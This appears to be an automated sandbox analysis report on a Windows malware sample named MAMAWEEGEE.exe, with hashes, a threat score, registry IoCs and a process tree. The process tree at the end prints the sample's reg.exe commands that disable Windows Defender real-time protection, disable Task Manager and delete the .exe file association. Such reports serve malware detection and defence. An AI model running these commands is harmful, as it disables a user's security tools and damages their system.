06a80e0fa37a104fb7dfa397d0fb60672f9408d057933e685a7df9be09db52f9

Analysis

max time kernel
67s
max time network
68s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
24-04-2024 16:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

MAMAWEEGEE.exe
Size

146KB
MD5

7567087160362c815deda505d2c8e7b7
SHA1

616e5dd2a6dbfc50a716d004a4b2f7a7c0b63b6a
SHA256

06a80e0fa37a104fb7dfa397d0fb60672f9408d057933e685a7df9be09db52f9
SHA512

9722b78a388fb9a332cf91a0874b77f7c12577d2b9f7cbb0ccb011650afa2dbedf9f2d35255492b9403ae7527eb67ab19d308395940f66a897e5d4dae1283108
SSDEEP

3072:R7DhdC6kzWypvaQ0FxyNTBfLRcpx698R9VeF25:RBlkZvaF4NTBjRcrpC+

Score

10^/10

evasion trojan

Malware Config

Signatures

Modifies Windows Defender Real-time Protection settings 3 TTPs 2 IoCs

evasion trojan

Modify Registry

T1112

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe

Disables Task Manager via registry modification
evasion
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 57 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff6f00000019000000f50400007e020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000ef5bfd35b1e26c7d761b5121e6d8f7bfdc85042db241bbe384402f1f7834e811000000000e8000000002000020000000bdab87a567a13f10f2c311a1f723e84fab7c6f51309f5d4e52456045ef2148f0a0020000baf304695f30bb1483dd875c5818758fec7df1025ba31df96a6a454b80c523666b6850f5f5c6eb7c6ff6fc201f6c1e915a0a5b1f8f5458688ea25f4909363d21366f607036bf4ef1c16f70f5f2fa7fa1b0b20fb53493b39b177b4fdd9f1eaa921a471457c05393cfd6f049d7ca0fd37a45971bc12fbcee1f3d4adf0addc385e18264cd9940a61f79429e0c0b3eda0f300a505f79501f504e8c2361f240e70ff0b48355172a39126df6f2db81f9570c447b656b73573113bbf4026a64f6da1b8d85fcef3c81a91ad870c8756c4c1888261e14377aa9802f7571517df40e3ea29c166c3d59a5a17d9f46fb2dc4c930819c5d3c3d268716fa83fd82deccb4653842de08b27287c7d86bf14399093fd8242b05585c60639035cfcf7e810170d0f1bb3155152097942b8b816426507cb1a68d68a16c09cae5652d33a6858bc2651479316543d3b0814da536998ac99977dc0381ff5789501b4dbcf12859e9b5960a1bea4d350b2cde678e662aafd3c8fcb3522193e92e8c92e29ff0c1eebaee2c0c047fe2f7d3fff0bc09f35c0a765500516af6941ddd69911f18235b047b2d1e1dd4c689b1435a262618647606027d8e2c0a793dce253ea763176992db600cb79e37978d2f46c4c227fa7731b6d6ad2bbc7991c8cf485decb6b0945837330a3dad11e54ce09810ad900ce593928f27e3fd6043821e028f19d9b90c9d907a88510ac449c457e6f76d259c805434841d835adc1a362c358926d33380004e1f36d92ef1234da388fe3643cbd6e8d3b3d6cd112945f9c668bc9dc53b5924ba6c5e7b4829c7389e9b5fe5cfe3fb6805c418704701008e7e4186787b1ace9e0bee5a27be97ad42ae79b8612689f7370c719c50b173b4d7b26ff36ede55c7f472a14e1ce825ce3469f40981a39ac4e52018b872b322726e558d5886c913fa111c6fcd3ae82840000000216751931807de5801a24136e24a53b3fdc61a408c346644f11d29df319eb72d5362b154fcf21aba642c091c6fa6b83fff53269c7ac39970d7153f065496809c	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000b63fe023a578465ce4f869208638821c0a05f3fc0d06d54261adeda5abea77d1000000000e80000000020000200000008001b08ba158ea5272b5cc2207442c0e44f8da9e9dac94605683020e7ff36940a00200008b6747f65614c05cb036e615988e096985225481abfc4a0e23e8f80af181902fdec8a2f630689edbbbac4ff9916886872d7a6f648e8e85825c6e6372f2beaaca0aeed89c41ca666a54900a714163391129eb920215446115e5a550b093e0b5664a14af7439124c088e65ee25c34e6b02e0feedd6a92b8ccf2269d50c5a04b9724ce9109a7f5789f9ab56d952ba47bed8748084c20e47fff236179a5669978330bffd8f12ef4835dd0ed5768ac2d2ea6cb021deab3b05c97be387308c8f877a0d29a0a1c98df7b97959d3f487969fe08c7f16dc6c103bd78cda60bc298d67a1dd236b8c58bb0437c17fc1322495f17b47ce6d401cdd8839804fc8b2f7b4aa57abb16f17841b5d7f0ae7e9012eaa5e90b2c47b5b2906a72c47b08f0d86990d71e22645ac60dc43df5d3906bec3ddac0ccc09ffab1593758c5979ee2e02222780881482cb3fb8ec7a62388e6da44b57ec97e9ce977686b8454a81e336277fdf9ac14df170eafe9350bf06689b73baccb20dca613bc740973dc6654422ec07ed57acaa87a1300aaa886a2c442a4429f2cdc9e992ef7447c0bbfccd7830be23035468d0a894b80c02dd3947f155350589ae9b6571e08efc44719932bbbd1ecdd26560a7015c3ace92c9892d19d51db8ef58dc4c32ab31ea117aadd2badc734f74cac02d59e4f484e0bdb1ea174f367507e9ebf38f391cfe2fe7594784c878f231a9e3e2f7685e8acdfe231d6b7a3706ef2a67f14084f166b42171edd38f7c7a2fc6695c40f5a2c27602b5c04267a8cd96a370416420d1e1ceac3e3d2c9aa65c8d5cd4e80b192ca5e68c7423d359e999c2d177f0251a49d0147dc26ed8310e28c6a4ba00af0fe57bc60e8858f9ea2e965542015ee1ced64b9221a3a775335ab1b4a844dd42c5261816a7751ff0517e2b9d0e87ed46863e2f1dec37f56347a0721c5b3040000000c10730232709e05341e6e32ecd7885d9b099c9312527b58660da27d2b9792d4c30356f88404e99721d97cf29819d7e48f54426d13653c44420cde836ddd50d7d	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000786be52a5572029e881103035815779275dbd54e90453f8eb9358825932cb236000000000e800000000200002000000079dfeaa26efac42a8ab8b4c5a133f83e63c28955603941ca5110a6730a799e62200000006ec03f481173bb31da1384ced4dd19c35c438614a765d6d94f55ff42509c5da440000000f92924234840aff644243eec4f247b9c9aeadbfd8512f46fb4c51990f5508775d2cb8750e6412b79001afb5fb854351ccd1a0715553a461eff90ae983cc35ab6	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff5600000000000000dc04000065020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff00000000000000008604000065020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000e23eddb0b92ef749a210002e8deb8704160db28d2ee0e58294acc02317a9b8e9000000000e8000000002000020000000d5cc9d95d8d099c018b292550cdaaa9d891339e3d0fcb78e8caf2473d10363fba00200007625ca6fc59290c00058d45425ca6ac24673afa5a7a03f03167f0dd3f89fc9fab84c1763f9e8ae3e21cac7a0ae3173b954390abdf60dfac60d164491f0f07f8e3e78cd33a566fca4be96cf8def07275b4f7c12669b96de29a2a95cabe9221dd434d4f43de08976e085f73aa744d0cc6494a8bc02f4bfe12852b2e21af94517bb265fd439e472542013ceb33782b4e7b51df1986679a306cb10ee42e8b4f80b2f8c84f5956f498bc3d8eace3b6ae7cfd5b36b6c3d1df6791e26e1b68950a40ded57230faa8b21b4c51eb6c3df131934dee5cecc9e458476897f86cedac2cee3a5745265344b77e2b33c4fc6cf097a53129253217a5b62731fbccacbc73d1fa917c04e3c519c5b092620c4be65e8c95b90639401c1740c272698f3406411c6e54250d6c61f130981f3e71d41c5fecdd2e4c3cbdfc85dc12c90ba4df58fa6793ec3cbc09ced1d0edd53eb961e637fd62e065b400d975b112fdfc9b5b9248c08e2684e5323afdf46a54f6f10c9b1238a4743c889b319e6bdbb8e81568eaf755c971cfa45cc321506733e621c6146233b5f61d21f90e230726059becec5f442c6ccf26ac2001e12ae288cb8e60bd2637937684992800dff158fa0a62e612769a618c74fb37a9a5a35ab4c84fab4946dcf28a570276b6ff07e90f70ff003f24e8b51fa161eb16a64f5375c8d533b6af32e4427ec0b89f102ca6943dafdb58157899a36cd10ad986f354014cdd5b2b39c8ce1b003da29b70772bd9863dd1b48ca6b39e96f9e46d48486547a229be0e7e8eed6f4e7907dad464337fb3526aa6583f1ddf96cce64e48561d154727acbd92c0fe0cb6769dcd437ec33508849a7edc3ba7d84b727de14b6e6f0ff7f55e12d7b62202e1f8e2c231071b9c041a15d33455de1ceddbfcdfe53d6edc3056bdb246005a012cf8947ae538f4c9234b88b07ecadda134000000057cefa84c61a47a13e8aa0bebf85a2ed142f7db9a6619f5c5d23e0ed73bf02184e16bad57369bca0ae82bd54ec4c7ea7c338137b2520b77ea03d0b00068b97ff	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000fffffffffffffffffffffffffffffffff8ffffff000000007e04000065020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{07F5A511-025A-11EF-805C-EAAAC4CFEF2E} = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000ff9a4e6c0c9b8e976d243c86413c2332685950287e423c89e581e7dd9fc4ff47000000000e80000000020000200000005db1897a31839fad4e1fe8eb725cf08519a61bbe901a0861907658e9f66d124ca0020000694d297ccfe98b65a39fc92fcb2e5ffb1202aa08a756e701818006356d3b5d5239c9094123b9b69772153278f1f69d71279d1ff6dd2787199f10d7ad528905117b2706cbd394c1174bca1e38723e5eef91597762a91f855476dd57a90c25537c9982cbdded882baab5c8174e430c5032930cb9c9e060223621bca7267b8eec3e2740cac0194de52dd33608f021e055044c0e6c9ec31b4b15fb6a46bcb9256739cc2afaa7e98a413ba253a3ede32b8a03fd74f581b97c3aae7b00fd080e26a7af1a8e8a4203630a5813f127b72da079c37484b34fc4d2bef6ddfe30d46308686444ea2ff1be6277aaaf86aead62b061df17ec78e4402d455bcecb21c7851258bbc7794ffa2d33265cb4624fb2f68079404fcbb9fc73e0fe245d343d63abd6b856271ac4bf24f8036dc488081d772d477564b61696264b516d846a967f068ec00a30165b93d2b78a4225f644ffcde1e5fd07e9d99a7c00e435dd7b1add574b7b2e7a9f09abc79c7b1edfda67bcc5e42463b9b86104c989e9d18ebe1c7ca58657f87ae1bf066e60e2205c4b9da27bf81fc3ff0f812855eb2819d297fb9eafb5c62dcb9fba52ac85bfe622ae3c5a6414df81eda00a20034406f7fbcf5055c6d6ef1bb655fb62642c5e781e9af8423943471daf087cf054604ee49060b446d61ffc856f977b52dcf34f7321325449d136aa0560a612606eb56fb039273d6ad6ee86998b29910df76e81b6b6592562b57ff7e180aaa419506973ef9a2b74a6bcd57580c54c716b962e54e9b20bf068547501475da31502dcecf07384fe82d6cf1a06688211521ae20f9bb8baf41918646001967b9fc9935f4221cee464e36384c490e42b0e13ce5b1a9ec2cf037f7c9e06059afc68d1dc505abb0a8d8e2415bf54c8b812ef30e9d49ceea86554ae506481159dbc08d7818844e9283521bd4fe7a5fdfa40000000da297c74beac554501e8a48a7349f7ff06e383ebfc1f8a2da7279da3187f23346dc851046dec6fce7cedd753a38bd09be3d707feed2ad87d214e652d35367414	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000000000001000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 70fa8bcb6696da01	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000071c834f68b8ed044a0afda50fbc58a7000000000020000000000106600000001000020000000143ffe92a64930481d381e5418597712b9dc35ed3e583a4dcffe3f12a9b2309c000000000e8000000002000020000000e0e515e971d93da72fa82ac8f4ee02b1667e6f314b7741a98a5616502b95a842a0020000ed47c71d8d2560a5d9e613a444e36a50291db9f27b37042c9dd1f13a7a2938f1b9f29bcad442a0d3d47bb9a3f6322199c32f25801128b43a04b15e9af1527ddfc42f4f4ad0c2cff62bf8db2925e8c058496996d6e241a4870774cc7942ddf4d1faa31c3f35cdb9c7570b9bddd8811e7b03e2be9f1dc3a2b5db069a1fbbfa3ac86094385508ed618006337a2ebc5bc2892150e007deebb34a4fa349a8db1e588f4487638d2c0b4d911918e26b733b38140529e1ca4ed989ca76832417a779b07fe30ff1f21ea0f8b26d6a90e057ac65647ec8ac4ca4b401a3ffd5283a760c64caa3043cb74b87ee286e6580d48322d1fd0939144979d3f1de6469d521cc59284f06c8f6db335f946bc98f5df97c30927c1385b5c4b36e39c5b6dfef3487bae06357e6252c1b902f9c29835f860146b30b5f209e7e8d15ba5cfac92d4ef02ebe715ed0f6cc0a29a04087509894e5a9877455bbde01d591d950f51ff73a6220b729e4f2a0ba1c31f73a724ac7e484aa09cd9d34ffcdd71ff12764c7e3a2211c652a2243a920a4efc313d4f7e7b34167b9b71ac83193bfadcad6b65f2760baca4e97fd2042792150e8294f85e126c70ff427530293eded32f1e0dfa3877c1c587cd9072a0a7ab52abbcae3b07cc9f085af272b51c4424eabf3bd21d4e8824f789e9eb714708f60e57a04e5c9c98e514946ba89d01a168d20471bb3f1fd4b35efdd11491f46191267c4ae97e7a22c607156724482340056a349c2f5d7d1418b5c485e6fe02ff835c617944aa7b3753110aefa6995b8de813138901a2e16b62924e6c29daa759b293dea596128107308bda8da2a094c17dd92bece547b6ba319d77f220a2eae342e0f47e0d94d3797e2d48f65b1de9a215079b93d98c41d80ee051bcd05cfb22d0f57c9eaf5e44bbdcb6c096699551bec88612bb1f751969b0987283240000000d64a16db0f9c83aea417d5ad67e70738f9ee24fda5ae3479dca169ac90af9d0fafad7ad84760caca43462cb8a40fb429f9db9923d591e9f9f1588f0e995cb75e	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe

Suspicious use of FindShellTrayWindow 6 IoCs

Processes:

iexplore.exe

pid process

2592 iexplore.exe
2592 iexplore.exe
2592 iexplore.exe
2592 iexplore.exe
2592 iexplore.exe
2592 iexplore.exe

Suspicious use of SetWindowsHookEx 28 IoCs

Processes:

iexplore.exeIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXEIEXPLORE.EXE

pid	process
2592	iexplore.exe
2592	iexplore.exe
2592	iexplore.exe
2592	iexplore.exe
2408	IEXPLORE.EXE
2408	IEXPLORE.EXE
2408	IEXPLORE.EXE
2408	IEXPLORE.EXE
2592	iexplore.exe
2592	iexplore.exe
2592	iexplore.exe
2592	iexplore.exe
1792	IEXPLORE.EXE
1792	IEXPLORE.EXE
2768	IEXPLORE.EXE
2768	IEXPLORE.EXE
2592	iexplore.exe
2592	iexplore.exe
616	IEXPLORE.EXE
616	IEXPLORE.EXE
2408	IEXPLORE.EXE
2408	IEXPLORE.EXE
2768	IEXPLORE.EXE
2768	IEXPLORE.EXE
1792	IEXPLORE.EXE
1792	IEXPLORE.EXE
2408	IEXPLORE.EXE
2408	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 53 IoCs

Processes:

MAMAWEEGEE.execmd.exeiexplore.exe

description	pid	process	target process
PID 1912 wrote to memory of 2316	1912	MAMAWEEGEE.exe	cmd.exe
PID 1912 wrote to memory of 2316	1912	MAMAWEEGEE.exe	cmd.exe
PID 1912 wrote to memory of 2316	1912	MAMAWEEGEE.exe	cmd.exe
PID 1912 wrote to memory of 2316	1912	MAMAWEEGEE.exe	cmd.exe
PID 2316 wrote to memory of 2152	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2152	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2152	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2052	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2052	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2052	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2596	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2596	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2596	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 3000	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 3000	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 3000	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 1968	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 1968	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 1968	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2092	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2092	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2092	2316	cmd.exe	reg.exe
PID 2316 wrote to memory of 2592	2316	cmd.exe	iexplore.exe
PID 2316 wrote to memory of 2592	2316	cmd.exe	iexplore.exe
PID 2316 wrote to memory of 2592	2316	cmd.exe	iexplore.exe
PID 2592 wrote to memory of 2408	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 2408	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 2408	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 2408	2592	iexplore.exe	IEXPLORE.EXE
PID 2316 wrote to memory of 2416	2316	cmd.exe	iexplore.exe
PID 2316 wrote to memory of 2416	2316	cmd.exe	iexplore.exe
PID 2316 wrote to memory of 2416	2316	cmd.exe	iexplore.exe
PID 2316 wrote to memory of 2472	2316	cmd.exe	iexplore.exe
PID 2316 wrote to memory of 2472	2316	cmd.exe	iexplore.exe
PID 2316 wrote to memory of 2472	2316	cmd.exe	iexplore.exe
PID 2592 wrote to memory of 2768	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 2768	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 2768	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 2768	2592	iexplore.exe	IEXPLORE.EXE
PID 2316 wrote to memory of 2296	2316	cmd.exe	iexplore.exe
PID 2316 wrote to memory of 2296	2316	cmd.exe	iexplore.exe
PID 2316 wrote to memory of 2296	2316	cmd.exe	iexplore.exe
PID 2592 wrote to memory of 1792	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 1792	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 1792	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 1792	2592	iexplore.exe	IEXPLORE.EXE
PID 2316 wrote to memory of 1200	2316	cmd.exe	iexplore.exe
PID 2316 wrote to memory of 1200	2316	cmd.exe	iexplore.exe
PID 2316 wrote to memory of 1200	2316	cmd.exe	iexplore.exe
PID 2592 wrote to memory of 616	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 616	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 616	2592	iexplore.exe	IEXPLORE.EXE
PID 2592 wrote to memory of 616	2592	iexplore.exe	IEXPLORE.EXE

C:\Users\Admin\AppData\Local\Temp\MAMAWEEGEE.exe
"C:\Users\Admin\AppData\Local\Temp\MAMAWEEGEE.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1912

C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\4A2.tmp\4A3.tmp\4A4.bat C:\Users\Admin\AppData\Local\Temp\MAMAWEEGEE.exe"
2⤵
- Suspicious use of WriteProcessMemory
PID:2316

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
3⤵
PID:2152

C:\Windows\system32\reg.exe
REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f
3⤵
- Modifies Windows Defender Real-time Protection settings
PID:2052

C:\Windows\system32\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
3⤵
PID:2596

C:\Windows\system32\reg.exe
reg delete HKCR/.exe
3⤵
PID:3000

C:\Windows\system32\reg.exe
